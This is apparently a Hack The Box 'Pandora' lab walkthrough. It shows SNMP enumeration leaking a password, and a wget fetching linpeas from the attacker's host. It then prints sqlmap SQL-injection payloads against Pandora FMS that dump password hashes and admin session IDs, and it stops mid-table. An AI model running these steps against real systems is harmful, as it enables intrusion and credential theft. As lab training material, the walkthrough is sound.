HTB - Pandora

24 minute read

Nmap Scan

Lets perform nmap scan on the target machine,

┌──(kaliaidenpearce369)-[~]
└─$ nmap -sC -sV -A 10.10.11.136                     
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 10:51 EDT
Nmap scan report for 10.10.11.136
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.09 seconds

Finding other services,

┌──(kaliaidenpearce369)-[~]
└─$ nmap -p1-10000 -T4 10.10.11.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 10:53 EDT
Warning: 10.10.11.136 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.136
Host is up (0.21s latency).
Not shown: 9995 closed tcp ports (conn-refused)
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
1022/tcp filtered exp2
3996/tcp filtered abcsoftware
5091/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 149.09 seconds

So ssh and http are the only services running in this machine

Enumeration

We cannot access ssh because we dont know the credentials yet

Since we have http web service running on, we can try enumerating this

After browsing through the static web page,

I found that I’m able to pass request parameters on the email form, but that doesn’t lead a way

And there is hint on the webpage, suggesting us to create a hostname

Image

Lets add a new hostname in our /etc/hosts file and perform a scan again

┌──(kaliaidenpearce369)-[~]
└─$ nmap -sC -sV -A panda.htb      
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 11:13 EDT
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.13 seconds
                                                                                                                                                             
┌──(kaliaidenpearce369)-[~]
└─$ nmap -p1-10000 -T4 panda.htb   
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 11:15 EDT
Warning: 10.10.11.136 giving up on port because retransmission cap hit (6).
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.21s latency).
Not shown: 9995 closed tcp ports (conn-refused)
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
213/tcp  filtered ipx
283/tcp  filtered rescap
7753/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 133.54 seconds

Same results on doing nmap scan

By default it scans only TCP ports, lets scan UDP ports

┌──(kaliaidenpearce369)-[~]
└─$ sudo nmap -p1-300 -T4 panda.htb -sU
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 11:25 EDT
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.26s latency).
Not shown: 284 closed udp ports (port-unreach)
PORT    STATE         SERVICE
21/udp  open|filtered ftp
72/udp  open|filtered netrjs-2
73/udp  open|filtered netrjs-3
84/udp  open|filtered ctf
161/udp open          snmp
165/udp open|filtered xns-courier
174/udp open|filtered mailq
202/udp open|filtered at-nbp
204/udp open|filtered at-echo
209/udp open|filtered tam
215/udp open|filtered softpc
260/udp open|filtered openport
261/udp open|filtered nsiiops
269/udp open|filtered manet
275/udp open|filtered unknown
286/udp open|filtered fxp

Nmap done: 1 IP address (1 host up) scanned in 300.09 seconds

snmp service is open

Enumerating SNMP

Since snmp uses UDP protocol, lets use snmpwalk to enumerate the information used by this protocol

┌──(kaliaidenpearce369)-[~]
└─$ snmpwalk -v 1 -c public 10.10.11.136 > snmp-enum.txt

...

┌──(kaliaidenpearce369)-[~]
└─$ cat snmp-enum.txt  -n | grep '\-u'
   739  iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.4.0-91-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0 maybe-ubiquity
  1279  iso.3.6.1.2.1.25.4.2.1.2.517 = STRING: "systemd-udevd"
  1689  iso.3.6.1.2.1.25.4.2.1.4.517 = STRING: "/lib/systemd/systemd-udevd"
  1735  iso.3.6.1.2.1.25.4.2.1.5.1 = STRING: "maybe-ubiquity"
  1914  iso.3.6.1.2.1.25.4.2.1.5.898 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
  1916  iso.3.6.1.2.1.25.4.2.1.5.902 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
  1923  iso.3.6.1.2.1.25.4.2.1.5.1100 = STRING: "-u daniel -p HotelBabylon23"

Alternatively, we can use metasploit module to perform SNMP enumeration

msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.11.136
RHOSTS => 10.10.11.136
msf6 auxiliary(scanner/snmp/snmp_enum) > run

[+] 10.10.11.136, Connected.

[*] System information:

Host IP                       : 10.10.11.136
Hostname                      : pandora
Description                   : Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
Contact                       : Daniel
Location                      : Mississippi
Uptime snmp                   : 01:10:29.61
Uptime system                 : 01:10:16.49
System date                   : 2022-3-30 16:05:12.0

[*] Network information:

IP forwarding enabled         : no
Default TTL                   : 64
TCP segments received         : 176958
TCP segments sent             : 178677
TCP segments retrans          : 1338
Input datagrams               : 184979
Delivered datagrams           : 184979
Output datagrams              : 187172

...

672                 unknown             ext4-rsv-conver                                             
686                 runnable            systemd-resolve     /lib/systemd/systemd-resolved                    
687                 runnable            systemd-timesyn     /lib/systemd/systemd-timesyncd                    
696                 runnable            VGAuthService       /usr/bin/VGAuthService                    
697                 runnable            vmtoolsd            /usr/bin/vmtoolsd                       
757                 runnable            accounts-daemon     /usr/lib/accountsservice/accounts-daemon                    
758                 runnable            dbus-daemon         /usr/bin/dbus-daemon--system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
762                 runnable            irqbalance          /usr/sbin/irqbalance--foreground        
766                 runnable            networkd-dispat     /usr/bin/python3    /usr/bin/networkd-dispatcher --run-startup-triggers
767                 runnable            rsyslogd            /usr/sbin/rsyslogd  -n -iNONE           
772                 runnable            systemd-logind      /lib/systemd/systemd-logind                    
773                 runnable            udisksd             /usr/lib/udisks2/udisksd                    
828                 runnable            polkitd             /usr/lib/policykit-1/polkitd--no-debug          
870                 runnable            cron                /usr/sbin/cron      -f                  
880                 runnable            cron                /usr/sbin/CRON      -f                  
898                 runnable            sh                  /bin/sh             -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'
901                 runnable            atd                 /usr/sbin/atd       -f                  
902                 running             snmpd               /usr/sbin/snmpd     -LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid
903                 runnable            sshd                sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups                    
959                 runnable            agetty              /sbin/agetty        -o -p -- \u --noclear tty1 linux
968                 runnable            apache2             /usr/sbin/apache2   -k start            
1017                runnable            mysqld              /usr/sbin/mysqld                        
1018                runnable            apache2             /usr/sbin/apache2   -k start            
1019                runnable            apache2             /usr/sbin/apache2   -k start            
1100                runnable            host_check          /usr/bin/host_check -u daniel -p HotelBabylon23
1189                runnable            apache2             /usr/sbin/apache2   -k start            
1209                runnable            apache2             /usr/sbin/apache2   -k start            
1215                runnable            apache2             /usr/sbin/apache2   -k start            
1502                unknown             kworker/1:0-events                                          
1831                runnable            apache2             /usr/sbin/apache2   -k start            
1842                runnable            apache2             /usr/sbin/apache2   -k start            
2064                runnable            apache2             /usr/sbin/apache2   -k start            
2065                runnable            apache2             /usr/sbin/apache2   -k start            
2280                unknown             kworker/u4:1-events_power_efficient                                        
2514                unknown             kworker/u4:2-events_power_efficient                                        
2515                unknown             kworker/0:0-events                                          
2518                unknown             kworker/1:2-events                                          
2977                runnable            apache2             /usr/sbin/apache2   -k start            
3266                unknown             kworker/1:1-events                                          
3267                unknown             kworker/1:3                                                 


[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

From this information, we have a credential -u daniel -p HotelBabylon23'

Gaining Foothold

Lets try to login via SSH

┌──(kaliaidenpearce369)-[~]
└─$ ssh daniel@panda.htb                
The authenticity of host 'panda.htb (10.10.11.136)' can't be established.
ED25519 key fingerprint is SHA256:yDtxiXxKzUipXy+nLREcsfpv/fRomqveZjm6PXq9+BY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'panda.htb' (ED25519) to the list of known hosts.
daniel@panda.htb's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 30 Mar 16:16:55 UTC 2022

  System load:           0.0
  Usage of /:            63.3% of 4.87GB
  Memory usage:          8%
  Swap usage:            0%
  Processes:             231
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.136
  IPv6 address for eth0: dead:beef::250:56ff:feb9:e7c7

  => /boot is using 91.8% of 219MB


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

daniel@pandora:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel)
daniel@pandora:~$ whoami
daniel

Now we dont have permission to read the user flag,

daniel@pandora:/home$ ls
daniel  matt
daniel@pandora:/home$ cd matt
daniel@pandora:/home/matt$ ls
user.txt
daniel@pandora:/home/matt$ cat user.txt
cat: user.txt: Permission denied
daniel@pandora:/home/matt$ 

Trying standard privilege escalation techniques, got some SUID binaries

daniel@pandora:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1

/usr/bin/pandora_backup seems interesting and /usr/bin/at can be used to bypass restricted shell

daniel@pandora:~$ ls -l /usr/bin/at
-rwsr-sr-x 1 daemon daemon 55560 Nov 12  2018 /usr/bin/at
daniel@pandora:~$ ls -l /usr/bin/pandora_backup
-rwsr-x--- 1 root matt 16816 Dec  3 15:58 /usr/bin/pandora_backup

The second user matt can run /usr/bin/pandora_backup, so we need to get to matt

Downloading linpeas.sh from our attacker machine,

daniel@pandora:~$ wget http://10.10.14.5:8000/linpeas.sh
--2022-03-30 16:21:53--  http://10.10.14.5:8000/linpeas.sh
Connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 775707 (758K) [text/x-sh]
Saving to: linpeas.sh

linpeas.sh                              100%[============================================================================>] 757.53K   458KB/s    in 1.7s    

2022-03-30 16:21:55 (458 KB/s) - linpeas.sh saved [775707/775707]

By running linPEAS , it shows sudo version is 1.8.31 which is vulnerable

daniel@pandora:~$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31
daniel@pandora:~$ which python3
/usr/bin/python3
daniel@pandora:~$ python3 exploit_nss.py 
Traceback (most recent call last):
  File "exploit_nss.py", line 220, in <module>
    assert check_is_vuln(), "target is patched"
AssertionError: target is patched

But running the exploit showed it is patched

On running process list, there were many apache process and a mysql process

daniel@pandora:/var$ ps -aux

...

root         968  0.0  0.7 227944 30768 ?        Ss   14:54   0:00 /usr/sbin/apache2 -k start
mysql       1017  0.0  2.3 1710488 93948 ?       Ssl  14:54   0:03 /usr/sbin/mysqld
www-data    1018  0.0  0.3 228348 14380 ?        S    14:54   0:00 /usr/sbin/apache2 -k start
www-data    1019  0.0  0.3 228348 14380 ?        S    14:54   0:00 /usr/sbin/apache2 -k start
root        1100  0.0  0.0   2488  1388 ?        S    14:55   0:00 /usr/bin/host_check -u daniel -p HotelBabylon23
www-data    1189  0.0  0.3 228348 14384 ?        S    14:58   0:00 /usr/sbin/apache2 -k start
www-data    1209  0.0  0.3 228348 14384 ?        S    15:00   0:00 /usr/sbin/apache2 -k start
www-data    1215  0.0  0.3 228348 14384 ?        S    15:00   0:00 /usr/sbin/apache2 -k start
www-data    1831  0.0  0.3 228348 14384 ?        S    15:18   0:00 /usr/sbin/apache2 -k start
www-data    1842  0.0  0.3 228348 14384 ?        S    15:18   0:00 /usr/sbin/apache2 -k start
www-data    2064  0.0  0.3 228348 14384 ?        S    15:26   0:00 /usr/sbin/apache2 -k start
www-data    2065  0.0  0.3 228348 14384 ?        S    15:26   0:00 /usr/sbin/apache2 -k start
www-data    2977  0.0  0.3 228348 14384 ?        S    15:58   0:00 /usr/sbin/apache2 -k start

We could not access mysql with our current user creds

daniel@pandora:/var$ mysql -u daniel -p
Enter password: 
ERROR 1045 (28000): Access denied for user 'daniel'@'localhost' (using password: YES)

Since there are many apache processes running behind, after enumerating it seems like there are two web apps running in this machine

daniel@pandora:/var/www$ ls
html  pandora
daniel@pandora:/var/www$ ls html/
assets  index.html
daniel@pandora:/var/www$ ls pandora/
index.html  pandora_console
daniel@pandora:/var/www$ cat /etc/hosts
127.0.0.1 localhost.localdomain pandora.htb pandora.pandora.htb
127.0.1.1 pandora

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Testing it with curl command,

daniel@pandora:/var/www$ curl localhost
<meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/">
daniel@pandora:/var/www$ curl http://localhost/pandora_console
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://localhost/pandora_console/">here</a>.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at localhost Port 80</address>
</body></html>
daniel@pandora:/var/www$ curl http://localhost/pandora_console/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...

So there is an another web app running internally

To access this web app, we need port forwarding which can be done by ssh

┌──(kaliaidenpearce369)-[~]
└─$ ssh -L 8081:127.0.0.1:80 -N daniel@panda.htb   
daniel@panda.htb's password: 

Now we can access the web app on port 8081 of our local machine

Image

We can access the internal web app locally now

Privilege Escalation

We have a login page right infront of us,

Tried generic SQLi payload, but it did not work

From the given information on site, it is running Pandora FMS with version of v7.0NG742

Lets search for exploit for this specific version,

┌──(kaliaidenpearce369)-[~]
└─$ searchsploit pandora 7.0
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Pandora 7.0NG - Remote Code Execution                                                                                      | php/webapps/47898.py
Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated)                                                          | php/webapps/49046.txt
Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities                                          | php/webapps/49139.txt
Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)                                                      | php/webapps/49312.txt
Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution                                                                  | php/webapps/48280.py
PANDORAFMS 7.0 - Authenticated Remote Code Execution                                                                       | php/webapps/48064.py
PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting                                                                    | php/webapps/48707.txt
PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting                                                          | php/webapps/48700.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

But googling the specific version number, the first link will give interesting results

Image

This version has Unauthenticated SQLi, since we have mysql running lets try this,

Exploit referred to this CMS, where this SQLi is an Union based attack

Lets run sqlmap on the vulnerable URI

┌──(kaliaidenpearce369)-[~]
└─$ sqlmap --url="http://localhost:8081/pandora_console/include/chart_generator.php?session_id=''" --dbms=mysql --dump
        ___
       __H__                                                                                                                                                 
 ___ ___[.]_____ ___ ___  {1.6.3#stable}                                                                                                                     
|_ -| . [(]     | .'| . |                                                                                                                                    
|___|_  [']_|_|_|__,|  _|                                                                                                                                    
      |_|V...       |_|   https://sqlmap.org                                                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:13:19 /2022-03-30/

[13:13:19] [INFO] testing connection to the target URL
[13:13:19] [WARNING] potential permission problems detected ('Access denied')
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=koihrjg9bqn...s4mdrdmie7'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: session_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: session_id=-5176' OR 2190=2190#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: session_id=''' OR (SELECT 2464 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(2464=2464,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IdPE

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: session_id=''' AND (SELECT 2215 FROM (SELECT(SLEEP(5)))mPZg)-- gdEY
---
[13:13:22] [INFO] testing MySQL
[13:13:22] [INFO] confirming MySQL
[13:13:23] [WARNING] reflective value(s) found and filtering out
[13:13:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (focal or eoan)
web application technology: PHP, Apache 2.4.41
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[13:13:23] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[13:13:23] [INFO] fetching current database
[13:13:23] [INFO] retrieved: 'pandora'
[13:13:23] [INFO] fetching tables for database: 'pandora'

...

We have found the database name is pandora

Dumping the tpassword_history table,

┌──(kaliaidenpearce369)-[~]
└─$ sqlmap --url="http://localhost:8081/pandora_console/include/chart_generator.php?session_id=''" --dbms=mysql -D pandora -T tpassword_history  --dump
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.3#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:26:11 /2022-03-30/

[13:26:11] [INFO] testing connection to the target URL
[13:26:11] [WARNING] potential permission problems detected ('Access denied')
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=6up1pgja7ic...uoqu641vi3'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: session_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: session_id=-5176' OR 2190=2190#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: session_id=''' OR (SELECT 2464 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(2464=2464,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IdPE

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: session_id=''' AND (SELECT 2215 FROM (SELECT(SLEEP(5)))mPZg)-- gdEY
---
[13:26:13] [INFO] testing MySQL
[13:26:13] [INFO] confirming MySQL
[13:26:14] [WARNING] reflective value(s) found and filtering out
[13:26:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[13:26:14] [INFO] fetching columns for table 'tpassword_history' in database 'pandora'
[13:26:14] [INFO] resumed: 'id_pass'
[13:26:14] [INFO] resumed: 'int(10) unsigned'
[13:26:14] [INFO] resumed: 'id_user'
[13:26:14] [INFO] resumed: 'varchar(60)'
[13:26:14] [INFO] resumed: 'password'
[13:26:14] [INFO] resumed: 'varchar(45)'
[13:26:14] [INFO] resumed: 'date_begin'
[13:26:14] [INFO] resumed: 'datetime'
[13:26:14] [INFO] resumed: 'date_end'
[13:26:14] [INFO] resumed: 'datetime'
[13:26:14] [INFO] fetching entries for table 'tpassword_history' in database 'pandora'
[13:26:14] [INFO] resumed: '2021-06-11 17:28:54'
[13:26:14] [INFO] resumed: '0000-00-00 00:00:00'
[13:26:14] [INFO] resumed: '1'
[13:26:14] [INFO] resumed: 'matt'
[13:26:14] [INFO] resumed: 'f655f807365b6dc602b31ab3d6d43acc'
[13:26:14] [INFO] resumed: '2021-06-17 00:11:54'
[13:26:14] [INFO] resumed: '0000-00-00 00:00:00'
[13:26:14] [INFO] resumed: '2'
[13:26:14] [INFO] resumed: 'daniel'
[13:26:14] [INFO] resumed: '76323c174bd49ffbbdedf678f6cc89a6'
[13:26:14] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: pandora
Table: tpassword_history
[2 entries]
+---------+---------+---------------------+----------------------------------+---------------------+
| id_pass | id_user | date_end            | password                         | date_begin          |
+---------+---------+---------------------+----------------------------------+---------------------+
| 1       | matt    | 0000-00-00 00:00:00 | f655f807365b6dc602b31ab3d6d43acc | 2021-06-11 17:28:54 |
| 2       | daniel  | 0000-00-00 00:00:00 | 76323c174bd49ffbbdedf678f6cc89a6 | 2021-06-17 00:11:54 |
+---------+---------+---------------------+----------------------------------+---------------------+

[13:26:19] [INFO] table 'pandora.tpassword_history' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/pandora/tpassword_history.csv'
[13:26:19] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/localhost'

[*] ending @ 13:26:19 /2022-03-30/

Dumping values from tsession_php table,

┌──(kaliaidenpearce369)-[~]
└─$ sqlmap --url="http://localhost:8081/pandora_console/include/chart_generator.php?session_id=''" --dbms=mysql -D pandora -T tsessions_php  --dump    
        ___
       __H__                                                                                                                                                 
 ___ ___[,]_____ ___ ___  {1.6.3#stable}                                                                                                                     
|_ -| . ["]     | .'| . |                                                                                                                                    
|___|_  ["]_|_|_|__,|  _|                                                                                                                                    
      |_|V...       |_|   https://sqlmap.org                                                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:27:32 /2022-03-30/

[13:27:32] [INFO] testing connection to the target URL
[13:27:33] [WARNING] potential permission problems detected ('Access denied')
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=92h891j6qs1...2e4r9vlg39'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: session_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: session_id=-5176' OR 2190=2190#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: session_id=''' OR (SELECT 2464 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(2464=2464,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IdPE

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: session_id=''' AND (SELECT 2215 FROM (SELECT(SLEEP(5)))mPZg)-- gdEY
---
[13:27:34] [INFO] testing MySQL
[13:27:34] [INFO] confirming MySQL
[13:27:35] [WARNING] reflective value(s) found and filtering out
[13:27:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal)
web application technology: PHP, Apache 2.4.41
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[13:27:35] [INFO] fetching columns for table 'tsessions_php' in database 'pandora'

...

Database: pandora
Table: tsessions_php
[56 entries]
+----------------------------+-----------------------------------------------------+-------------+
| id_session                 | data                                                | last_active |
+----------------------------+-----------------------------------------------------+-------------+
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel";                            | 1638783555  |
| 0ahul7feb1l9db7ffp8d25sjba | NULL                                                | 1638789018  |
| 130or2fa7sjfo5alc260nutu0t | id_usuario|s:6:"daniel";                            | 1648652125  |
| 1cqctk2bd1goq81nog694bmsdg | id_usuario|s:6:"daniel";                            | 1648660609  |
| 1um23if7s531kqf5da14kf5lvm | NULL                                                | 1638792211  |
| 2e25c62vc3odbppmg6pjbf9bum | NULL                                                | 1638786129  |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel";                            | 1638540332  |
| 3me2jjab4atfa5f8106iklh4fc | NULL                                                | 1638795380  |
| 4f51mju7kcuonuqor3876n8o02 | NULL                                                | 1638786842  |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel";                            | 1638535373  |
| 59qae699l0971h13qmbpqahlls | NULL                                                | 1638787305  |
| 5fihkihbip2jioll1a8mcsmp6j | NULL                                                | 1638792685  |
| 5g6l76p4mncnest9ot5hr7opv1 | id_usuario|s:5:"admin";                             | 1648660377  |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel";                            | 1638281946  |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel";                            | 1641195617  |
| 6up1pgja7ic6tti8uoqu641vi3 | NULL                                                | 1648661423  |
| 7cv0ph58mnnfpu45mh9mj3nv0v | NULL                                                | 1648661212  |
| 81f3uet7p3esgiq02d4cjj48rc | NULL                                                | 1623957150  |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel";                            | 1638446321  |
| 8upeameujo9nhki3ps0fu32cgd | NULL                                                | 1638787267  |
| 92h891j6qs18hn1k2e4r9vlg39 | NULL                                                | 1648661546  |
| 9dn1mbgeq1fljfhjsh9sk80asl | NULL                                                | 1648661124  |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel";                            | 1638881787  |
| a3a49kc938u7od6e6mlip1ej80 | NULL                                                | 1638795315  |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel";                            | 1638881664  |
| amn2o2cejcplib5qgjdv8cl2l6 | NULL                                                | 1648659314  |
| cojb6rgubs18ipb35b3f6hf0vp | NULL                                                | 1638787213  |
| d0carbrks2lvmb90ergj7jv6po | NULL                                                | 1638786277  |
| d59vtcusej59n46nn82rnv78n0 | NULL                                                | 1648658750  |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel";                            | 1641200284  |
| fikt9p6i78no7aofn74rr71m85 | NULL                                                | 1638786504  |
| fqd96rcv4ecuqs409n5qsleufi | NULL                                                | 1638786762  |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel";                            | 1638783230  |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1638796349  |
| gf40pukfdinc63nm5lkroidde6 | NULL                                                | 1638786349  |
| heasjj8c48ikjlvsf1uhonfesv | NULL                                                | 1638540345  |
| hhjlv9j3fvb96gurpogjkg10jb | id_usuario|s:5:"admin";                             | 1648660258  |
